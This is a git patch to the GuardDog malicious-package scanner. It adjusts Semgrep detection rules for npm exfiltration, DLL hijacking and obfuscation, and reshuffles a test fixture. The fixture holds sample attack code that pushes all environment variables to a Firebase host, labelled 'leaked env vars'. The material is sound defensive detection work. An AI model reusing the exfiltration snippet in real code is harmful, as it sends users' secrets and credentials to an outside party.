From 57cffa813c97efd730d08e2818989b9fb7731c8a Mon Sep 17 00:00:00 2001
From: Sebastian Obregoso <sebastian.obregoso@datadoghq.com>
Date: Mon, 13 Jan 2025 19:03:35 +0100
Subject: [PATCH] fixed pending cases

---
 guarddog/analyzer/sourcecode/npm-dll-hijacking.yml        | 2 --
 .../analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml | 8 +++++---
 guarddog/analyzer/sourcecode/npm-obfuscation.yml          | 2 --
 .../analyzer/sourcecode/npm-exfiltrate-sensitive-data.js  | 4 ++--
 4 files changed, 7 insertions(+), 9 deletions(-)

diff --git a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
index 9388e8f7..5fcd614d 100644
--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -86,5 +86,3 @@ rules:
             - focus-metavariable: $DLL
 
     severity: WARNING
-    options:
-      symbolic_propagation: true
diff --git a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
index 0a4110df..f285d8b5 100644
--- a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
@@ -84,12 +84,14 @@ rules:
             - pattern: $HTTP. ... .request(...)
             - pattern: $HTTP. ... .get(...)
             - pattern: $HTTP. ... .post(...)
-            - pattern: $HTTP. ... .push(...)
+            - pattern: |
+                $FIRE=$HTTP.child(...)
+                ...
+                $FIRE.push(...)
             - pattern: $HTTP. ... .write(...)
             - pattern: $HTTP(...)
     languages:
       - javascript
       - typescript
     severity: WARNING
-    options:
-      symbolic_propagation: true
+
diff --git a/guarddog/analyzer/sourcecode/npm-obfuscation.yml b/guarddog/analyzer/sourcecode/npm-obfuscation.yml
index 5cc936e9..dffa30fa 100644
--- a/guarddog/analyzer/sourcecode/npm-obfuscation.yml
+++ b/guarddog/analyzer/sourcecode/npm-obfuscation.yml
@@ -60,5 +60,3 @@ rules:
     languages:
       - javascript
     severity: WARNING
-    options: 
-      symbolic_propagation: true
diff --git a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
index f625f89c..234359e1 100644
--- a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
+++ b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
@@ -66,8 +66,8 @@ function f(){
 function f(){
     var Firebase = require("firebase");
     var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/");
-    var dbRef = ref.child("env_vars");
     // ruleid: npm-exfiltrate-sensitive-data
+    var dbRef = ref.child("env_vars");
     dbRef.push({status : "leaked env vars", message : process.env}, clean());
 
 }
@@ -75,8 +75,8 @@ function f(){
 function f(){
     var Firebase = require("firebase");
     var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/");
-    var dbRef = ref.child("env_vars");
     // ok: npm-exfiltrate-sensitive-data
+    var dbRef = ref.child("env_vars");
     dbRef.push({status : "leaked env vars", message : "anymsg"}, clean());
 
 }